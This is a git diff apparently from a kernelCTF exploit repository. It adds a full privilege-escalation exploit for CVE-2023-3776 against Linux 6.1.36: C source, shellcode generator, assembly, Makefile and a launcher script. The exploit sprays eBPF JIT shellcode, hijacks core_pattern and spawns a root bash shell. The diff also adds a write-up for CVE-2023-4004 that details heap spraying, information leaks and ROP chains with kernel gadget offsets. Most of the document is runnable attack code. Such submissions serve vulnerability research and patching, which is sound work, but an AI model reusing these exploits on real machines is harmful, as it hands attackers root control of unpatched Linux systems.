exploit + dd if=poc.tar.gz of=exploit conv=notrunc oflag=append + +poc: poc.c foo.o sc.h + gcc poc.c -o poc -static -no-pie -g foo.o -pthread +root: root.c + gcc -static -o root root.c +foo.o: foo.s + nasm -f elf64 foo.s +sc.h: sc.py + python3 sc.py > sc.h + +clean: + rm -rf exploit poc foo.o sc.h root + diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC new file mode 100644 index 00000000..7ac6c636 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/POC differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit new file mode 100644 index 00000000..fb2c9953 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o new file mode 100644 index 00000000..ba3ffecd Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s new file mode 100644 index 00000000..f437a8e3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s @@ -0,0 +1,25 @@ +section .text + global write_to_cpu_entry_area + global handle +write_to_cpu_entry_area: + mov rsp,rdi + pop r15 + pop r14 + pop r13 + pop r12 + pop rbp + pop rbx + pop r11 + pop r10 + pop r9 + pop r8 + pop rax + pop rcx + pop rdx + pop rsi + pop rdi + div qword [0x1234000] + + + + diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 new file mode 100755 index 00000000..060aff4d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 new file mode 100755 index 00000000..e59a56ac Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc new file mode 100755 index 00000000..cd459eb8 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c new file mode 100644 index 00000000..55d79687 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c @@ -0,0 +1,306 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + +#define PAUSE \ + { \ + printf(":"); \ + int x; \ + read(0, &x, 1); \ + } +extern void write_to_cpu_entry_area(void *buf); +void handle(int s) {} +void set_cpu(int i) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} +int cfd[2]; +int sfd[0x200][2]; +char payload[0x1000]; +char buf[0x1000]; +struct sock_filter filter[0x1000]; +int stopfd[2]; +const int DRR_CLASS_SPRAY_THREADS = 0x100; + +void *job(void *x) +{ + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + set_cpu(0); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = { + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x80}; + sendmsg(sfd[idx][1], &mhdr, 0); +} + +void do_spray() +{ + memset(payload,0,0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x400; + first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg + first->cmsg_type = 0x41414141; + + /* Try to overwrite struct drr_class's qdisc at offset 0x60 */ + /* That address is at CPU#1 cpu_entry_area's entry_stack_page (stack address) while it try to push r15 in function error_entry*/ + *(size_t*)&payload[0x60] = 0xfffffe000003df58; + + for (int i = 0; i < DRR_CLASS_SPRAY_THREADS; i++) + { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + pthread_t tid; + for (int i = 0; i < DRR_CLASS_SPRAY_THREADS; i++) + pthread_create(&tid, 0, job, (void*)(size_t)i); + read(cfd[1], buf, DRR_CLASS_SPRAY_THREADS); +} + +int sc(void) +{ + set_cpu(1); + unsigned int prog_len = 0x900; + /* In current environment, the max instructions in a program is near 0x900 + And we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably + */ + struct sock_filter table[] = { + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, + {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}}; + +/* 0xb3909090 is NOPsled shellclode to make exploitation more reliable +90 nop +90 nop +90 nop +b3 b8 mov bl, 0xb8 +*/ + for (int i = 0; i < prog_len; i++) + filter[i] = table[0]; + + filter[prog_len - 1] = table[1]; + int idx = prog_len - 2; + +#include "sc.h" + + struct sock_fprog prog = { + .len = prog_len, + .filter = filter, + }; + int fd[2]; + for (int k = 0; k < 0x50; k++) + { + if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit. + { + close(stopfd[1]); + for (int i = 0; i < 0x100; i++) + { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd)); + SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog))); + } + write(stopfd[0], buf, 1); + read(stopfd[0], buf, 1); + exit(0); + } + } + /* wait for all forks to finish spraying BPF code */ + read(stopfd[1], buf, 0x50); +} +char POC[0x1000]; + +// the payload generated from `tc class delete dev lo classid 1:10` +// to generate payload from `tc` command, we can breakpoint at `netlink_sendmsg` +// after `tc` command is run, and we can dump the payload using this gdb command: +// dump binary memory /tmp/tc_del msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len +// refs: https://man7.org/linux/man-pages/man7/rtnetlink.7.html https://wiki.slank.dev/book/types.html +size_t DEL[] = { + 0x0005002900000024, 0x00000000649bcb96, + 0x0000000100000000, 0x0001000000010010, + 0x0000000000000000}; + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp, ret; + char edit[0x100]; + ret = unshare(CLONE_NEWNET | CLONE_NEWUSER); + if (ret < 0) + { + perror("unshare"); + } + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + return; +} + +int main(int argc, char **argv) +{ + if (fork() == 0) // this process is used to find our process by `pidof billy` + { + set_cpu(1); + strcpy(argv[0], "billy"); + while (1) + sleep(1); + } + if (fork() == 0) // this process is used to trigger core_pattern exploit + { + set_cpu(1); + setsid(); + crash(""); + } + setvbuf(stdout, 0, 2, 0); + unshare_setup(getuid(), getgid()); + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd); + struct rlimit rlim = { + .rlim_cur = 0xf000, + .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + // iptables-legacy -t mangle -A POSTROUTING -d 127.0.0.1/24 -j MARK --set-mark 1 + { + set_cpu(1); + int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); + int fd = open("./ip0", O_RDONLY); + int n = read(fd, buf, 0x1000); + setsockopt(s, 0, 64, buf, n); + fd = open("./ip1", O_RDONLY); + n = read(fd, buf, 0x1000); + setsockopt(s, 0, 65, buf, n); + set_cpu(0); + } + + char *core = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0); + strcpy(core, "|/proc/%P/fd/666"); // put payload string into known address which will used by ebpf shellcode + + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); // later use this socket to trigger vuln + set_cpu(1); + sc(); // spray ebpf program. + do_spray(); // prepare spray thread first. + set_cpu(0); + + /* + ip link set lo up + tc qdisc add dev lo root handle 1: drr + tc class add dev lo parent 1: classid 1:10 drr quantum 60 + tc filter add dev lo parent 1: pref 100 protocol ip handle 1 fw classid 1:10 + tc filter replace dev lo pref 100 protocol ip handle 1 fw classid 1:20 indev loo + */ + /* + generated using gdb command after breakpoint on netlink_sendmsg: + dump binary memory /tmp/POC msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len + */ + { + int poc_fd = open("./POC", O_RDONLY); + read(poc_fd, POC, 0x1000); + write(fd, POC, 0x1000); + } + + write(fd, DEL, 0x24); // tc class delete dev lo classid 1:10 + write(cfd[1], buf, 0x200); // spray kmalloc-0x80 to reallocate. + sleep(3); + + struct sockaddr_in addr = { + .sin_family = AF_INET, + .sin_port = htons(80), + .sin_addr.s_addr = inet_addr("127.0.0.1"), + }; + + size_t fake_qdisc_struct[0x10] = {}; + + /* Overwrite struct Qdisc's enqueue which is function ptr + struct Qdisc { + int (*enqueue)(struct sk_buff *, struct Qdisc *, struct sk_buff * *); + struct sk_buff * (*dequeue)(struct Qdisc *); + unsigned int flags; + */ + + fake_qdisc_struct[0] = 0xffffffffcc000000 - 0x800; + + /* + eBPF generated shellcode is lay in this range, we spray eBPF multiple times and summarize it's often near in this page. + It's more reliabe we choose address in the middle of the page + ffffffffa0000000 |-1536 MB | fffffffffeffffff | 1520 MB | module mapping space + */ + + int c = socket(AF_INET, SOCK_DGRAM, 0); + + if (fork() == 0) // Put payload in fixed kernel address (CVE-2023-0597) + { + set_cpu(1); + signal(SIGFPE, handle); + signal(SIGTRAP, handle); + signal(SIGSEGV, handle); + setsid(); + write_to_cpu_entry_area(fake_qdisc_struct); + } + sleep(1); + /* Trigger Qdisc filter our packet and control kernel RIP */ + SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr))); +} diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz new file mode 100644 index 00000000..8ab7e2f5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root new file mode 100755 index 00000000..8e589308 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c new file mode 100644 index 00000000..c71dffe8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c @@ -0,0 +1,43 @@ +#define _GNU_SOURCE /* See feature_test_macros(7) */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYS_pidfd_getfd 438 +char buf[0x100]; +char path[0x100]; +int res; +int fd; +int port; +char* ip; +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash","bash",NULL); + +} +int main(int argc,char** argv){ + job(0); + + +} diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh new file mode 100644 index 00000000..c3f781b1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh @@ -0,0 +1,5 @@ +#!/bin/sh +dd if=$0 of=/tmp/exp.tar.gz skip=1 +cd /tmp +tar -xf exp.tar.gz +./poc diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h new file mode 100644 index 00000000..ff8f028b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h @@ -0,0 +1,51 @@ +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d0ff}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c14e7c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c70b740}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90ff31}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf02948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca0b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c4fb640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c64b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c00b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c909058}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d0ff}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c909050}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9030b2}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d231}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c10e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca0b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cd08948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf22948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ce0b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cc1b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf4b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c01b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cd78948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf20148}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c60b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca4b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c5bb640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c01b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cc20148}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ce2d348}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9020b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c931}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90320f}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9082b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c18e1c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c0b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d231}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c931}; diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py new file mode 100644 index 00000000..c7ebb63e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python3 + +from pwn import * +import struct + +entry_syscall = 0xffffffff82200000 +core_pattern = 0xffffffff837ba460 +copy_from_user = 0xffffffff8186e280 +msleep = 0xffffffff812292e0 + +off1 = entry_syscall-core_pattern +off2 = core_pattern-copy_from_user +off3 = copy_from_user-msleep +ins = ["sub", "add"] + +context.arch = 'amd64' + +ASM=f""" +; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64 +; ECX should be MSR_LSTAR ( 0xc0000082 ) +xor ecx, ecx +xor edx, edx +mov cl, 0xc0 +shl ecx, 24 +mov cl, 0x82 +rdmsr +; make rdx = entry_SYSCALL_64's address +xor ecx, ecx +mov cl, 32 +shl rdx, cl +add rdx, rax +; entry_SYSCALL_64 + 0x15a68e0 = core_pattern +; move core_pattern to rdi ( 1st arg ) +xor esi,esi +mov sil, {(abs(off1)>>24)&0xff} +shl esi, 8 +mov sil, {(abs(off1)>>16)&0xff} +shl esi, 8 +mov sil, {(abs(off1)>>8)&0xff} +shl esi, 8 +mov sil, {(abs(off1))&0xff} +{ins[off1<0]} rdx, rsi +mov rdi, rdx +; core_pattern - 0x1fe7cc0 = copy_from_user +; move copy_from_user to rax +xor esi,esi +mov sil, {(abs(off2)>>24)&0xff} +shl esi, 8 +mov sil, {(abs(off2)>>16)&0xff} +shl esi, 8 +mov sil, {(abs(off2)>>8)&0xff} +shl esi, 8 +mov sil, {(abs(off2))&0xff} +{ins[off2<0]} rdx, rsi +mov rax, rdx +; call copy_from_user(core_pattern, user_buf, 0x30); +; user_buf = 0xa00000 = "|/proc/%P/fd/666" +xor esi, esi +mov sil,0xa0 +shl esi,16 +xor edx,edx +mov dl,0x30 +push rax +call rax +pop rax +; copy_from_user - 0x63f6d0 = msleep +xor esi, esi +mov sil, {(abs(off3)>>24)&0xff} +shl esi, 8 +mov sil, {(abs(off3)>>16)&0xff} +shl esi, 8 +mov sil, {(abs(off3)>>8)&0xff} +shl esi, 8 +mov sil, {(abs(off3))&0xff} +{ins[off3<0]} rax, rsi +; move 0x7000000 to rdi ( 1st arg ) +xor edi,edi +mov dil,0x70 +shl edi,20 +call rax +""" +def toi(data): + assert len(data) == 4 + return struct.unpack('ext)->data; + + start = first_rule; + rules_fx = rules_f0; + + nft_pipapo_for_each_field(f, i, m) { + if (!pipapo_match_field(f, start, rules_fx, + match_start, match_end)) + break; + ... +``` + +But a NFT_SET_EXT_KEY_END is not necessary. Function `nft_pipapo_insert` shows a correct way to handle it: + +``` + ... + if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END)) + end = (const u8 *)nft_set_ext_key_end(ext)->data; + else + end = start; + ... +``` + + +## Triggering the vulnerability + +It's easy to trigger it by following this steps: + +- Create a pipapo set +- Insert a element into the set without NFT_SET_EXT_KEY_END +- Flush the set without NFT_SET_EXT_KEY_END(After this, the element will be freed but won't be removed from the set) +- Flush the set without NFT_SET_EXT_KEY_END again(After this, the element will be freed again) + +## Exploit it +CVE-2023-4004 is very easy to exploit because you can free the element many times. The size of the element is not stable which means there's many ways to exploit it: +``` +void *nft_set_elem_init(const struct nft_set *set, + const struct nft_set_ext_tmpl *tmpl, + const u32 *key, const u32 *key_end, + const u32 *data, u64 timeout, u64 expiration, gfp_t gfp) +{ + struct nft_set_ext *ext; + void *elem; + + elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); + if (elem == NULL) + return NULL; + ... +``` +The tmpl->len is related to your input like NFTA_SET_ELEM_USERDATA which means you can control the size of the element. So you just need to find a structure to leak information and control RIP. I choose to use some structures in nftables: `nft_tables` and `nft_object` +``` +struct nft_table { + struct list_head list; + struct rhltable chains_ht; + struct list_head chains; + struct list_head sets; + struct list_head objects; + struct list_head flowtables; + u64 hgenerator; + u64 handle; + u32 use; + u16 family:6, + flags:8, + genmask:2; + u32 nlpid; + char *name; + u16 udlen; + u8 *udata; +}; + +struct nft_object { + struct list_head list; + struct rhlist_head rhlhead; + struct nft_object_hash_key key; + u32 genmask:2, + use:30; + u64 handle; + u16 udlen; + u8 *udata; + /* runtime data below here */ + const struct nft_object_ops *ops ____cacheline_aligned; + unsigned char data[] + __attribute__((aligned(__alignof__(u64)))); +}; +``` +It's easy to spray heap by creating many nft_table with NFTA_TABLE_USERDATA: +``` + ... + if (nla[NFTA_TABLE_USERDATA]) { + table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL); + if (table->udata == NULL) + goto err_table_udata; + + table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]); + } + ... +``` +And nft_object has a pointer of a function list(`const struct nft_object_ops *ops`), which will be useful for leaking information and control RIP. + +The size of the object is different when you use different type of object. I choose to use the `NFT_OBJECT_CT_EXPECT` object. The heap used by this object belongs to kmalloc-192. +### Leak info + +I leak some useful infomation by the following steps. + +- Create pipapo `set A` +- Insert `element B` into `set A` without NFT_SET_EXT_KEY_END(make sure sizeof(`element B`)>192 && sizeof(`element B`)<256) +- Flush `set A`, `element B` will be freed but won't be removed +- Create many tables with NFTA_TABLE_USERDATA to get the heap of `element B` back, the length of `NFTA_TABLE_USERDATA` should equal to sizeof(`element B`) +- Flush `set A` again, `element B` will be freed again but won't be removed +- Create many objects, the size of the objects should equal to sizeof(`element B`). One of them will get the heap of `element B` back. +- Dump/Get all the tables we spray. The `NFTA_TABLE_USERDATA` of one of them should be a strcture of a object. + +### Control RIP +I control the RIP by the following steps which is very similar I used for leaking useful information: + +- Create pipapo `set A` +- Insert `element B` into `set A` without NFT_SET_EXT_KEY_END(make sure sizeof(`element B`)>192 && sizeof(`element B`)<256) +- Flush `set A`, `element B` will be freed but won't be removed +- Create many tables with NFTA_TABLE_USERDATA to get the heap of `element B` back, the length of `NFTA_TABLE_USERDATA` should equal to sizeof(`element B`) +- Flush `set A` again, `element B` will be freed again but won't be removed +- Create many objects with `NFTA_OBJ_USERDATA`. The size of the objects should equal to sizeof(`element B`) . `NFTA_OBJ_USERDATA` of the object will be used for ROP. +- Dump/Get all the tables we spray. Find the target tables. The `NFTA_TABLE_USERDATA` of one of them should be a strcture of a object. +- Delete the target table to free the heap of the object. +- Spray many tables with NFTA_TABLE_USERDATA to get the heap of the object back. After this, we will fill fake data of the object. I overwrite object->ops to control RIP. +- Get target object, and we will finally jump to ROP. + ``` + static int nft_object_dump(struct sk_buff *skb, unsigned int attr, + struct nft_object *obj, bool reset){ + struct nlattr *nest; + + nest = nla_nest_start_noflag(skb, attr); + if (!nest) + goto nla_put_failure; + if (obj->ops->dump(skb, obj, reset) < 0)//After overwrite the ops, we can control RIP here. + goto nla_put_failure; + nla_nest_end(skb, nest); + return 0; + ... + ``` +### ROP detail +Once we finish the step 7 of `Control RIP`, we can get the heap address of the `NFTA_OBJ_USERDATA` of target object, which we spray at step 6. +And I fill the fake data of the object by this: +``` + //ops is the pointer of the memory we will fill in NFTA_OBJ_USERDATA + //the filed at 0x20 of ops is ops->dump. + *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff8198954b;//push rsi ; jmp qword ptr [rsi + 0x39] + ... + //The filed at 0x48 of the leak_obj is obj->udata, which will be created by NFTA_OBJ_USERDATA. + uint64_t rop_target_addr = *(uint64_t *)(&leak_obj[0x48]); + printf("rop : %lx\n", rop_target_addr); + //Now we try to fill fake data of the object + //stack migration first time + *(uint64_t *)(&leak_obj[0x39]) = kernel_off + 0xffffffff81027924;//pop rsp ; ret + // stack migration second time + *(uint64_t *)(&leak_obj[0]) = kernel_off + 0xffffffff81027924;//pop rsp ; ret + *(uint64_t *)(&leak_obj[8]) = rop_target_addr + 0x60;//This is the final ROP address. + *(uint64_t *)(&leak_obj[0x80]) = rop_target_addr;//the filed at 0x80 offset is a nft_object_ops struct pointer which set to the heap addr of NFTA_OBJ_USERDATA. + ... +``` + +And the step of ROP looks like this: +``` + + obj->ops->dump(skb, obj, reset) -> + push rsi ; jmp qword ptr [rsi + 0x39] -> //RSI will be the pointer of the object + pop rsp ; ret -> //stack migration, the rsp will be the pointer of the object + pop rsp ; ret -> //stack migration again, the rsp will be rop_target_addr + 0x60(the pointer of the NFTA_OBJ_USERDATA + 0x60) + now we can do normal ROP here +``` diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md new file mode 100755 index 00000000..72108929 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,29 @@ +# Vulneribility + In function nft_pipapo_remove in file /net/netfilter/nft_set_pipapo.c, there is a line of code: + + + match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data; + + + But it is possible to insert a element without a NFT_SET_EXT_KEY_END. So it is possiable that you free the nft_pipapo_elem but you still have it in the nft_set struct. + +## Requirements to trigger the vulnerability + - Capabilities: `CAP_NET_ADMIN` capability is required. + - Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` + - Are user namespaces needed?: Yes + +## Commit which introduced the vulnerability + - [commit 3c4287f62044a90e73a561aa05fc46e62da173da](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4287f62044a90e73a561aa05fc46e62da173da) + +## Commit which fixed the vulnerability +- [commit 87b5a5c209405cb6b57424cdfa226a6dbd349232](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=87b5a5c209405cb6b57424cdfa226a6dbd349232) + +## Affected kernel versions +- 5.6-rc1 and later + +## Affected component, subsystem +- net/netfilter (nf_tables) + +## Cause +- 